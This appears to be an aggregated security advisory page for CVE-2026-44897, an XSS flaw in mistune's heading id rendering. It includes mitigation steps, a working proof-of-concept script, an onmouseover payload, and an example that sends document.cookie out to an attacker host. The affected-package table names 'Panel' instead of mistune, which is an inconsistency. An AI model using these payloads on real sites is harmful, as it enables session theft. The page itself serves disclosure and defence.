Mistune's Markdown renderer inserts heading IDs directly into HTML without escaping, allowing an attacker who controls heading text to break out of the id= attribute and inject arbitrary JavaScript event handlers. The attack requires the heading_id callback — the standard pattern used by every major documentation generator to create human-readable slug anchors — meaning the vast majority of real-world mistune deployments with TOC enabled are affected, not fringe configurations. With 463 downstream dependents spanning documentation platforms, wikis, and AI-powered content pipelines, and a full working PoC already published, the exploitation bar is low once malicious content reaches a rendered page. Upgrade to mistune 3.2.1 immediately, or independently sanitize all heading_id callback return values with html.escape() as an interim workaround.
What is the risk?
Medium risk overall, elevated in AI/ML deployments where LLM-generated or user-submitted Markdown is rendered with mistune. The vulnerability only activates when a custom heading_id callback is in use, but this is the dominant real-world usage pattern for any documentation or wiki platform. No CISA KEV listing and no active exploitation reported, but the PoC is published and reproducible in minutes. The OpenSSF Scorecard of 5.2/10 and package risk score of 26/100 indicate broader supply chain hygiene concerns beyond this specific issue. Risk compounds in agentic pipelines where AI-generated content is rendered before human review.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Panel | pip | <= 3.2.0 | 3.2.1 |
Do you use Panel? You're affected.
How severe is it?
What is the attack surface?
What should I do?
5 steps-
Upgrade mistune to 3.2.1 (patched release).
-
If immediate upgrade is blocked, wrap any heading_id callback return value with html.escape() before returning it.
-
Audit all codebases using add_toc_hook() with a custom heading_id parameter — search for 'add_toc_hook' and 'heading_id' across your dependency tree and application code.
-
For detection: review rendered HTML output for unescaped double-quote characters inside id= attributes on heading elements (h1–h6).
-
Apply strict Content Security Policy headers (script-src 'self') on all Markdown-rendering endpoints as defense-in-depth to limit XSS blast radius regardless of library version.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-44897?
Mistune's Markdown renderer inserts heading IDs directly into HTML without escaping, allowing an attacker who controls heading text to break out of the id= attribute and inject arbitrary JavaScript event handlers. The attack requires the heading_id callback — the standard pattern used by every major documentation generator to create human-readable slug anchors — meaning the vast majority of real-world mistune deployments with TOC enabled are affected, not fringe configurations. With 463 downstream dependents spanning documentation platforms, wikis, and AI-powered content pipelines, and a full working PoC already published, the exploitation bar is low once malicious content reaches a rendered page. Upgrade to mistune 3.2.1 immediately, or independently sanitize all heading_id callback return values with html.escape() as an interim workaround.
Is CVE-2026-44897 actively exploited?
No confirmed active exploitation of CVE-2026-44897 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-44897?
1. Upgrade mistune to 3.2.1 (patched release). 2. If immediate upgrade is blocked, wrap any heading_id callback return value with html.escape() before returning it. 3. Audit all codebases using add_toc_hook() with a custom heading_id parameter — search for 'add_toc_hook' and 'heading_id' across your dependency tree and application code. 4. For detection: review rendered HTML output for unescaped double-quote characters inside id= attributes on heading elements (h1–h6). 5. Apply strict Content Security Policy headers (script-src 'self') on all Markdown-rendering endpoints as defense-in-depth to limit XSS blast radius regardless of library version.
What systems are affected by CVE-2026-44897?
This vulnerability affects the following AI/ML architecture patterns: Documentation generators and portals, RAG pipelines with Markdown rendering, AI chatbot UIs rendering LLM output, ML model card platforms, Interactive notebooks with Markdown cells.
What is the CVSS score for CVE-2026-44897?
CVE-2026-44897 has a CVSS v3.1 base score of 6.1 (MEDIUM). The EPSS exploitation probability is 0.23%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.001 AI Software AML.T0049 Exploit Public-Facing Application AML.T0051.001 Indirect AML.T0078 Drive-by Compromise Compliance Controls Affected
What are the technical details?
Original Advisory
## Summary `HTMLRenderer.heading()` builds the opening `<hN>` tag by string-concatenating the `id` attribute value directly into the HTML — with no call to `escape()`, `safe_entity()`, or any other sanitisation function. A double-quote character `"` in the `id` value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, `src=`, `href=`, etc.) into the heading element. The default TOC hook assigns safe auto-incremented IDs (`toc_1`, `toc_2`, …) that never contain user text. However, the `add_toc_hook()` API accepts a caller-supplied `heading_id` callback. Deriving heading IDs from the heading text itself — to produce human-readable slug anchors like `#installation` or `#getting-started` — is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the `id=` attribute. ## Details **File:** `src/mistune/renderers/html.py` ```python def heading(self, text: str, level: int, **attrs: Any) -> str: tag = "h" + str(level) html = "<" + tag _id = attrs.get("id") if _id: html += ' id="' + _id + '"' # ← _id is never escaped return html + ">" + text + "</" + tag + ">\n" ``` The `text` body (line content) *is* escaped upstream by the inline token renderer, which is why `text` arrives as `"` etc. But `_id` arrives as a raw string directly from whatever the `heading_id` callback returned — no escaping occurs at any point in the pipeline. ## PoC **Step 1 — Establish the baseline (safe default IDs)** The script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom `heading_id` callback). The default hook generates sequential numeric IDs: ```python md_safe = create_markdown(escape=True) add_toc_hook(md_safe) # default: heading_id produces toc_1, toc_2, … bl_src = "## Introduction\n" bl_out, _ = md_safe.parse(bl_src) ``` Output — ID is auto-generated, no user text appears in it: ```html <h2 id="toc_1">Introduction</h2> ``` **Step 2 — Add the realistic trigger: a text-based `heading_id` callback** Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, `mkdocs`, `sphinx`, `jekyll` all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation: ```python def raw_id(token, index): return token.get("text", "") # returns raw heading text as the ID md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ``` **Step 3 — Craft the exploit payload** Construct a heading whose text contains a double-quote followed by an injected attribute: ``` ## foo" onmouseover="alert(document.cookie)" x=" ``` When `raw_id` is called, `token["text"]` is `foo" onmouseover="alert(document.cookie)" x="`. This is passed verbatim to `heading()` as the `id` attribute value. **Step 4 — Observe attribute breakout in the output** ```python ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n' ex_out, _ = md_vuln.parse(ex_src) ``` Actual output: ```html <h2 id="foo" onmouseover="alert(document.cookie)" x="">foo" onmouseover="alert(document.cookie)" x="</h2> ``` Note: the heading **body text** is correctly escaped (`"`), but the **`id=` attribute** is not. A user who moves their mouse over the heading triggers `alert(document.cookie)`. Any JavaScript payload can be substituted. ### Script A verification script was created to verify this issue. It creates a HTML page showing the bypass rendering in the browser. ```python #!/usr/bin/env python3 """H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping.""" import os, html as h from mistune import create_markdown from mistune.toc import add_toc_hook def raw_id(token, index): return token.get("text", "") # --- baseline --- md_safe = create_markdown(escape=True) add_toc_hook(md_safe) bl_file = "baseline_h2.md" bl_src = "## Introduction\n" with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) bl_out, _ = md_safe.parse(bl_src) print(f"[{bl_file}]\n{bl_src}") print("[output — id=toc_1, no user content, safe]") print(bl_out) # --- exploit --- md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ex_file = "exploit_h2.md" ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n' with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) ex_out, _ = md_vuln.parse(ex_src) print(f"[{ex_file}]\n{ex_src}") print("[output — heading_id returns raw text, id= not escaped]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em} """ def case(kind, label, filename, src, out): return f""" <div class="case {kind}"> <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>Output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div> <div class="rendered">{out}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body> <h1>H2 — Heading ID XSS (unescaped id= attribute)</h1> <p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping. Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p> {case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)} {case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h2.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example Usage: ```bash python poc.py ``` Once the script is run, open `report_h2.html` in the browser and observe the behaviour. ## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction | | **Integrity** | DOM manipulation, phishing content injection, forced navigation | | **Availability** | Page freeze or crash available to attacker | **Risk context:** This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's `heading_id` callback without independently sanitising the returned value.
Exploitation Scenario
An adversary targeting an AI documentation platform or knowledge base powered by mistune crafts a Markdown document with the heading: '## Getting Started" onmouseover="fetch(atob(base64_encoded_exfil_url)+document.cookie)" x="'. The document is submitted to a wiki, uploaded as a model card, or injected into a RAG document store. When a privileged user — an admin, auditor, or CISO reviewing a compliance report — views the rendered page and moves their cursor over the heading, the injected event handler fires silently, exfiltrating their session token to attacker-controlled infrastructure. In a RAG pipeline context, a poisoned retrieval document could deliver the same payload against a security analyst's browser session when AI-summarized results are displayed.
Weaknesses (CWE)
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Primary
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
- [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
- [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N References
Timeline
Related Vulnerabilities
CVE-2024-13152 10.0 Mobuy Panel: SQLi allows unauthenticated DB takeover
Same package: panel CVE-2026-47744 9.9 Shopper: RBAC bypass allows full admin takeover
Same package: panel CVE-2024-13147 9.8 B2B Login Panel: SQLi enables unauthenticated DB access
Same package: panel CVE-2024-5960 9.8 Panel: plaintext credential storage enables domain compromise
Same package: panel CVE-2025-14014 9.8 Smart Panel: unauthenticated file upload enables RCE
Same package: panel